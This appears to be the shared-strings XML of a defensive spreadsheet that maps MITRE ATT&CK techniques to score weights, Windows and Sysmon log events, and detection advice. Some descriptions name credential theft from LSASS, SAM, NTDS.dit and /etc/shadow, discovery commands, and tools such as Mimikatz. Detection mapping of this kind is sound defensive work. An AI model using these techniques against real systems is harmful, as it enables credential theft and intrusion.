  </si>
  <si>
    <t>T1141</t>
  </si>
  <si>
    <t>T1142</t>
  </si>
  <si>
    <t>T1143</t>
  </si>
  <si>
    <t>T1144</t>
  </si>
  <si>
    <t>T1145</t>
  </si>
  <si>
    <t>T1146</t>
  </si>
  <si>
    <t>50;50</t>
  </si>
  <si>
    <t>T1147</t>
  </si>
  <si>
    <t>T1148</t>
  </si>
  <si>
    <t>T1149</t>
  </si>
  <si>
    <t>T1150</t>
  </si>
  <si>
    <t>T1151</t>
  </si>
  <si>
    <t>T1152</t>
  </si>
  <si>
    <t>T1153</t>
  </si>
  <si>
    <t>T1154</t>
  </si>
  <si>
    <t>T1155</t>
  </si>
  <si>
    <t>T1156</t>
  </si>
  <si>
    <t>T1157</t>
  </si>
  <si>
    <t>T1158</t>
  </si>
  <si>
    <t>T1159</t>
  </si>
  <si>
    <t>T1160</t>
  </si>
  <si>
    <t>T1161</t>
  </si>
  <si>
    <t>T1162</t>
  </si>
  <si>
    <t>T1163</t>
  </si>
  <si>
    <t>T1164</t>
  </si>
  <si>
    <t>T1165</t>
  </si>
  <si>
    <t>T1166</t>
  </si>
  <si>
    <t>T1167</t>
  </si>
  <si>
    <t>T1168</t>
  </si>
  <si>
    <t>T1169</t>
  </si>
  <si>
    <t>T1170</t>
  </si>
  <si>
    <t>T1171</t>
  </si>
  <si>
    <t>T1172</t>
  </si>
  <si>
    <t>T1173</t>
  </si>
  <si>
    <t>T1174</t>
  </si>
  <si>
    <t>T1175</t>
  </si>
  <si>
    <t>15;10;20;5;20;15;15</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>10;10;20;20;10;30</t>
  </si>
  <si>
    <t>T1177</t>
  </si>
  <si>
    <t>20;20;10;20;15;15</t>
  </si>
  <si>
    <t>T1178</t>
  </si>
  <si>
    <t>T1179</t>
  </si>
  <si>
    <t>15;10;20;20;20;15</t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>T1181</t>
  </si>
  <si>
    <t>T1182</t>
  </si>
  <si>
    <t>T1183</t>
  </si>
  <si>
    <t>T1184</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>30;15;30;25</t>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>20;25;20;35</t>
  </si>
  <si>
    <t>T1188</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>15;15;15;20;20;15</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>T1191</t>
  </si>
  <si>
    <t>20;30;25;25</t>
  </si>
  <si>
    <t>T1192</t>
  </si>
  <si>
    <t>10;20;20;10;10;15;15</t>
  </si>
  <si>
    <t>T1193</t>
  </si>
  <si>
    <t>10;10;20;20;20;20</t>
  </si>
  <si>
    <t>T1194</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>T1196</t>
  </si>
  <si>
    <t>15;10;15;15;15;15;15</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>T1198</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>T1206</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>25;35;20;20</t>
  </si>
  <si>
    <t>T1208</t>
  </si>
  <si>
    <t>T1209</t>
  </si>
  <si>
    <t>20;10;20;10;20;20</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1214</t>
  </si>
  <si>
    <t>T1215</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>T1223</t>
  </si>
  <si>
    <t>T1480</t>
  </si>
  <si>
    <t>T1482</t>
  </si>
  <si>
    <t>30;25;30;15</t>
  </si>
  <si>
    <t>T1483</t>
  </si>
  <si>
    <t>20;20;15;20;25</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>T1486</t>
  </si>
  <si>
    <t>25;30;25;20</t>
  </si>
  <si>
    <t>T1487</t>
  </si>
  <si>
    <t>T1488</t>
  </si>
  <si>
    <t>T1489</t>
  </si>
  <si>
    <t>T1490</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>T1492</t>
  </si>
  <si>
    <t>T1493</t>
  </si>
  <si>
    <t>T1494</t>
  </si>
  <si>
    <t>T1495</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>35;35;20;10</t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>10;15;15;15;15;15;15</t>
  </si>
  <si>
    <t>T1500</t>
  </si>
  <si>
    <t>T1501</t>
  </si>
  <si>
    <t>T1502</t>
  </si>
  <si>
    <t>T1503</t>
  </si>
  <si>
    <t>T1504</t>
  </si>
  <si>
    <t>T1505</t>
  </si>
  <si>
    <t>T1506</t>
  </si>
  <si>
    <t>T1514</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>T1519</t>
  </si>
  <si>
    <t>T1522</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>T1527</t>
  </si>
  <si>
    <t>T1528</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>T1531</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>T1535</t>
  </si>
  <si>
    <t>T1536</t>
  </si>
  <si>
    <t>22;22;22;12;22</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>30;30;10;30</t>
  </si>
  <si>
    <t>T1539</t>
  </si>
  <si>
    <t>Defense Bypassed</t>
  </si>
  <si>
    <t>10;20;15;15;10;10;20</t>
  </si>
  <si>
    <t>10;20;20;10;10;20;10</t>
  </si>
  <si>
    <t>20;20;10;20;20;10</t>
  </si>
  <si>
    <t>15;20;25;20;20</t>
  </si>
  <si>
    <t>30;35;30</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Data score</t>
  </si>
  <si>
    <t>Alerting</t>
  </si>
  <si>
    <t>Hunting</t>
  </si>
  <si>
    <t>Forensics</t>
  </si>
  <si>
    <t>EventID</t>
  </si>
  <si>
    <t>Event Description</t>
  </si>
  <si>
    <t>Log Name</t>
  </si>
  <si>
    <t>Verbosity Signal</t>
  </si>
  <si>
    <t>Detection Relevance</t>
  </si>
  <si>
    <t>Process creation</t>
  </si>
  <si>
    <t>Microsoft-Windows-Sysmon/Operational</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>A process changed a file creation time</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>Network connection</t>
  </si>
  <si>
    <t>Sysmon service state changed</t>
  </si>
  <si>
    <t>Process terminated</t>
  </si>
  <si>
    <t>Driver loaded</t>
  </si>
  <si>
    <t>WSMan session initialized</t>
  </si>
  <si>
    <t>Microsoft-Windows-WinRM/Operational</t>
  </si>
  <si>
    <t>Image loaded</t>
  </si>
  <si>
    <t>CreateRemoteThread</t>
  </si>
  <si>
    <t>WSMan session de-initialized</t>
  </si>
  <si>
    <t>RawAccessRead</t>
  </si>
  <si>
    <t>ProcessAccess</t>
  </si>
  <si>
    <t>FileCreate</t>
  </si>
  <si>
    <t>RegistryEvent (Value Set)</t>
  </si>
  <si>
    <t>RegistryEvent (Key and Value Rename)</t>
  </si>
  <si>
    <t>FileCreateStreamHash</t>
  </si>
  <si>
    <t>Sysmon Config State Changed</t>
  </si>
  <si>
    <t>PipeEvent - Pipe Created</t>
  </si>
  <si>
    <t>PipeEvent - Pipe Connected</t>
  </si>
  <si>
    <t>WmiEvent - WmiEventFilter activity detected</t>
  </si>
  <si>
    <t>WmiEvent - WmiEventConsumer activity detected</t>
  </si>
  <si>
    <t>WmiEvent - WmiEventConsumerToFilter activity detected</t>
  </si>
  <si>
    <t>RDP source IP / logon user name</t>
  </si>
  <si>
    <t>Microsoft-Windows-TerminalServices-LocalSessionManager/Operational</t>
  </si>
  <si>
    <t>RDP logon user name</t>
  </si>
  <si>
    <t>WinRM session creation</t>
  </si>
  <si>
    <t>RDP connection attempt with source IP / logon user name</t>
  </si>
  <si>
    <t>Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational</t>
  </si>
  <si>
    <t>The System log file was cleared (covers sysmon logs deletion)</t>
  </si>
  <si>
    <t>System</t>
  </si>
  <si>
    <t>Very High</t>
  </si>
  <si>
    <t>Scheduled task created</t>
  </si>
  <si>
    <t>Microsoft-Windows-TaskScheduler/Maintenance</t>
  </si>
  <si>
    <t>RDP successful connection</t>
  </si>
  <si>
    <t>Scheduled task updated</t>
  </si>
  <si>
    <t>Scheduled task deleted</t>
  </si>
  <si>
    <t>WinRM authenticating user</t>
  </si>
  <si>
    <t>Scheduled task executed</t>
  </si>
  <si>
    <t>Scheduled task completed</t>
  </si>
  <si>
    <t>Lookup: Query received</t>
  </si>
  <si>
    <t>DNS analytic logs</t>
  </si>
  <si>
    <t>Lookup: Response success</t>
  </si>
  <si>
    <t>Recursive query: Response in</t>
  </si>
  <si>
    <t>Engine Lifecycle - Start</t>
  </si>
  <si>
    <t>Windows PowerShell</t>
  </si>
  <si>
    <t>Engine Lifecycle - Stopped</t>
  </si>
  <si>
    <t>Provider Lifecycle</t>
  </si>
  <si>
    <t>Detected Malware</t>
  </si>
  <si>
    <t>Microsoft-Windows-Windows Defender/Operational</t>
  </si>
  <si>
    <t>Action on Malware failed</t>
  </si>
  <si>
    <t>The event logging service has shut down</t>
  </si>
  <si>
    <t>The audit log was cleared (Security)</t>
  </si>
  <si>
    <t>Security</t>
  </si>
  <si>
    <t>Windows Defender Antivirus has detected malware or other potentially unwanted software.</t>
  </si>
  <si>
    <t>Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.</t>
  </si>
  <si>
    <t>A rule has been added to the Windows Firewall exception list.</t>
  </si>
  <si>
    <t>Microsoft-Windows-Windows Firewall With Advanced Security/Firewall</t>
  </si>
  <si>
    <t>A rule has been modified in the Windows Firewall exception list.</t>
  </si>
  <si>
    <t>A rule has been deleted in the Windows Firewall exception list.</t>
  </si>
  <si>
    <t>PowerShell Module Logging</t>
  </si>
  <si>
    <t>Microsoft-Windows-PowerShell/Operational</t>
  </si>
  <si>
    <t>PowerShell Script Block Logging (Win 2012R2 and above)</t>
  </si>
  <si>
    <t>The system time was changed</t>
  </si>
  <si>
    <t>An account was successfully logged on</t>
  </si>
  <si>
    <t>An account failed to log on</t>
  </si>
  <si>
    <t>Group membership information (win10, 2016 &amp; 2019)</t>
  </si>
  <si>
    <t>A logon was attempted using explicit credentials</t>
  </si>
  <si>
    <t>A registry value was modified</t>
  </si>
  <si>
    <t>A handle to an object was requested</t>
  </si>
  <si>
    <t>An operation was performed on an object</t>
  </si>
  <si>
    <t>An attempt was made to access an object</t>
  </si>
  <si>
    <t>Special privileges assigned to new logon</t>
  </si>
  <si>
    <t>A new process has been created (enable command line logging, see references column)</t>
  </si>
  <si>
    <t>A service was installed in the system</t>
  </si>
  <si>
    <t>A scheduled task was created</t>
  </si>
  <si>
    <t>A scheduled task was deleted</t>
  </si>
  <si>
    <t>A scheduled task was updated</t>
  </si>
  <si>
    <t>A user account was created</t>
  </si>
  <si>
    <t>A user account was enabled</t>
  </si>
  <si>
    <t>A member was added to a security-enabled global group</t>
  </si>
  <si>
    <t>A member was added to a security-enabled local group</t>
  </si>
  <si>
    <t>A user account was changed</t>
  </si>
  <si>
    <t>A computer account was created</t>
  </si>
  <si>
    <t>A Kerberos authentication ticket (TGT) was requested</t>
  </si>
  <si>
    <t>A Kerberos service ticket was requested.</t>
  </si>
  <si>
    <t>The domain controller attempted to validate the credentials for an account (NTLM)</t>
  </si>
  <si>
    <t>A session was reconnected to a Window Station</t>
  </si>
  <si>
    <t>A security-enabled local group or account membership was enumerated (win10, 2016 &amp; 2019)</t>
  </si>
  <si>
    <t>A user's local group membership was enumerated.</t>
  </si>
  <si>
    <t>Code integrity determined that the image hash of a file is not valid (Kernel Driver Signing)</t>
  </si>
  <si>
    <t>A network share object was accessed</t>
  </si>
  <si>
    <t>High (File Shares, DC)</t>
  </si>
  <si>
    <t>A network share object was added</t>
  </si>
  <si>
    <t>A network share object was checked to see whether client can be granted desired access</t>
  </si>
  <si>
    <t>The Windows Filtering Platform blocked a packet</t>
  </si>
  <si>
    <t>The Windows Filtering Platform has allowed a connection</t>
  </si>
  <si>
    <t>The Windows Filtering Platform has permitted a bind to a local port</t>
  </si>
  <si>
    <t>ActiveScriptEventConsumer provider started</t>
  </si>
  <si>
    <t>Microsoft-Windows-WMI-Activity/Operational</t>
  </si>
  <si>
    <t>Registration of temporary WMI event consumer</t>
  </si>
  <si>
    <t>Registration of permanent WMI event consumer</t>
  </si>
  <si>
    <t>Event log service stopped</t>
  </si>
  <si>
    <t>Code Integrity determined that the page hashes of an image file are not valid (Kernel Driver Signing)</t>
  </si>
  <si>
    <t>Service entered stopped state (event log service, AV service etc.)</t>
  </si>
  <si>
    <t>A service config was changed</t>
  </si>
  <si>
    <t>AppLocker Block</t>
  </si>
  <si>
    <t>Microsoft-Windows-AppLocker/EXE and DLL</t>
  </si>
  <si>
    <t>AppLocker Warning</t>
  </si>
  <si>
    <t>Platforms</t>
  </si>
  <si>
    <t>Detection</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Tactic</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>Packet capture,Process use of network,Process monitoring,Network protocol analysis</t>
  </si>
  <si>
    <t>Linux,macOS,Windows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</si>
  <si>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</si>
  <si>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</si>
  <si>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command-and-control</t>
  </si>
  <si>
    <t/>
  </si>
  <si>
    <t>T1001.001</t>
  </si>
  <si>
    <t>Junk Data</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1001.002</t>
  </si>
  <si>
    <t>Steganography</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</si>
  <si>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</si>
  <si>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T1001.003</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>Linux,Windows,macOS</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</si>
  <si>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</si>
  <si>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OS Credential Dumping</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,Linux,macOS</t>
  </si>
  <si>
    <t>### Windows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[PowerShell](https://attack.mitre.org/techniques/T1086)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</si>
  <si>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</si>
  <si>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credential-access</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>Process command-line parameters,PowerShell logs,Process monitoring</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe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</si>
  <si>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Windows Security Support Provider (SSP) DLLs are loaded into LSSAS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</si>
  <si>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T1003.002</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>Hash dumpers open the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;)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</si>
  <si>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</si>
  <si>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T1003.003</t>
  </si>
  <si>
    <t>NTDS</t>
  </si>
  <si>
    <t>Windows event logs,Process command-line parameters,PowerShell logs,Process monitoring</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.</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</si>
  <si>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NTDS files on active Domain Controllers, attackers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</si>
  <si>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T1003.004</t>
  </si>
  <si>
    <t>LSA Secrets</t>
  </si>
  <si>
    <t>Process monitoring,PowerShell logs,Process command-line parameters</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1003.005</t>
  </si>
  <si>
    <t>Cached Domain Credentials</t>
  </si>
  <si>
    <t>PowerShell logs,Process command-line parameters,Process monitoring</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</si>
  <si>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
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</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</si>
  <si>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</si>
  <si>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T1003.006</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>Windows event logs</t>
  </si>
  <si>
    <t>Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)</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</si>
  <si>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</si>
  <si>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T1003.007</t>
  </si>
  <si>
    <t>Proc Filesystem</t>
  </si>
  <si>
    <t>Process monitoring</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/\*/maps&lt;/code&gt;, where the &lt;code&gt;\*&lt;/code&gt;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</si>
  <si>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Adversaries may gather credentials from information stored in the Proc filesystem or &lt;code&gt;/proc&lt;/code&gt;. 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
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>/etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t>The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.</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</si>
  <si>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</si>
  <si>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Data from Local System</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
</t>
  </si>
  <si>
    <t>collection</t>
  </si>
  <si>
    <t>Direct Volume Access</t>
  </si>
  <si>
    <t>API monitoring</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</si>
  <si>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[PowerShell](https://attack.mitre.org/techniques/T1086), additional logging of PowerShell scripts is recommended.</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</si>
  <si>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bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)</t>
  </si>
  <si>
    <t>defense-evasion</t>
  </si>
  <si>
    <t>File monitoring,File system access controls</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>discovery</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>Application Window Discovery</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>macOS,Windows</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</si>
  <si>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</si>
  <si>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attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>User interface,Process monitoring</t>
  </si>
  <si>
    <t>Monitor for processes utilizing the network that do not normally have network communication or have never been seen before. Processes that normally require user-driven events to access the network (for example, a web browser opening with a mouse click or key press) but access the network without such may be malicious.
Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</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</si>
  <si>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</si>
  <si>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exfiltration</t>
  </si>
  <si>
    <t>T1011.001</t>
  </si>
  <si>
    <t>Exfiltration Over Bluetooth</t>
  </si>
  <si>
    <t>Process monitoring,User interface</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker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</si>
  <si>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Query Registry</t>
  </si>
  <si>
    <t>Windows Registry,Process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</si>
  <si>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</si>
  <si>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</si>
  <si>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Rootkit</t>
  </si>
  <si>
    <t>BIOS,MBR,System calls</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</si>
  <si>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</si>
  <si>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</si>
  <si>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File monitoring,Host intrusion prevention systems,Application control,Signature-based detection,System access controls,Application control by file name or path,Anti-virus</t>
  </si>
  <si>
    <t>System Network Configuration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</si>
  <si>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</si>
  <si>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look for details about the network configuration and settings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use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Network protocol analysis,Process monitoring,Process use of network,Process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</si>
  <si>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</si>
  <si>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use local host files (ex: &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; or &lt;code&gt;/etc/hosts&lt;/code&gt;) in order to discover the hostname to IP address mappings of remote systems. 
Specific to macOS, the &lt;code&gt;bonjour&lt;/code&gt; protocol exists to discover additional Mac-based systems within the same broadcast domain.</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,Network</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.</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</si>
  <si>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</si>
  <si>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T1020.001</t>
  </si>
  <si>
    <t>Traffic Duplication</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Packet capture,Network protocol analysis</t>
  </si>
  <si>
    <t>Network</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor network traffic for uncommon data flows (e.g. unusual network communications, suspicious communications that have never been seen before, communications sending fixed size data packets at regular intervals).  Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. </t>
  </si>
  <si>
    <t>Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network infrastructure.  Traffic mirroring is a native feature for some network devices and used for network analysis and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network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Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives of the adversary.</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>Windows Registry,Windows event logs,Process use of network,Process monitoring,Process command-line parameters,PowerShell logs,Packet capture,Network protocol analysis,Netflow/Enclave netflow,File monitoring,DLL monitoring,Authentication logs,API monitoring</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</si>
  <si>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</si>
  <si>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Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept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t>
  </si>
  <si>
    <t>lateral-movement</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Process monitoring,Netflow/Enclave netflow,Authentication logs</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</si>
  <si>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</si>
  <si>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technique for Persistence.(Citation: Alperovitch Malware)</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Authentication logs,Process use of network</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</si>
  <si>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systems.(Citation: Medium Detecting WMI Persistence)</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</si>
  <si>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</si>
  <si>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T1021.003</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>Windows event logs,Windows Registry,Process monitoring,Packet capture,DLL monitoring,Authentication logs,API monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>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Monitor for any influxes or abnormal increases in Distributed Computing Environment/Remote Procedure Call (DCE/RPC) traffic.</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</si>
  <si>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 (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>Authentication logs,Process use of network,Network protocol analysis,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Linux,macOS</t>
  </si>
  <si>
    <t>Use of SSH may be legitimate depending on the environment and how it’s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</si>
  <si>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user.(Citation: SSH Secure Shell)</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>VNC</t>
  </si>
  <si>
    <t>Process use of network,Network protocol analysis,Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). The adversary may then perform actions as the logged-on user.
VNC is a desktop sharing system that allows users to remotely control another computer’s display by relaying mouse and keyboard inputs over the network. VNC does not necessarily use standard user credentials. Instead, a VNC client and server may be configured with sets of credentials that are used only for VNC connections.</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</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</si>
  <si>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events.(Citation: Medium Detecting Lateral Movement)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</si>
  <si>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t>
  </si>
  <si>
    <t>Data from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</si>
  <si>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</si>
  <si>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</si>
  <si>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Multiband Communication</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</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</si>
  <si>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Correlating alerts between multiple communication channels can further help identify command-and-control behavior.</t>
  </si>
  <si>
    <t>**This technique has been deprecated and should no longer be used.**
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</si>
  <si>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Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</t>
  </si>
  <si>
    <t xml:space="preserve">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 
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 </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</si>
  <si>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obfuscate commands executed from payloads or directly via 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</si>
  <si>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Host forensic analysis,Signature-based detection,Host intrusion prevention systems,Application control,Log analysis,Application control by file name or path</t>
  </si>
  <si>
    <t>T1027.001</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>Process monitoring,Binary file metadata,File monitoring,Malware reverse engineering</t>
  </si>
  <si>
    <t xml:space="preserve">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 </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</si>
  <si>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</si>
  <si>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Anti-virus,Signature-based detection</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>Binary file metadata</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</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</si>
  <si>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(Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.  </t>
  </si>
  <si>
    <t>Anti-virus,Heuristic detection,Signature-based detection</t>
  </si>
  <si>
    <t>T1027.003</t>
  </si>
  <si>
    <t>Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.</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</si>
  <si>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</si>
  <si>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T1027.004</t>
  </si>
  <si>
    <t>Compile After Delivery</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Monitor the execution file paths and command-line arguments for common compilers, such as csc.exe and GCC/MinGW, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior. The compilation of payloads may also generate file creation and/or file write events. Look for non-native binary formats and cross-platform compiler and execution frameworks like Mono and determine if they have a legitimate purpose on the system.(Citation: TrendMicro WindowsAppMac) Typically these should only be used in specific and limited cases, like for software development.</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</si>
  <si>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</si>
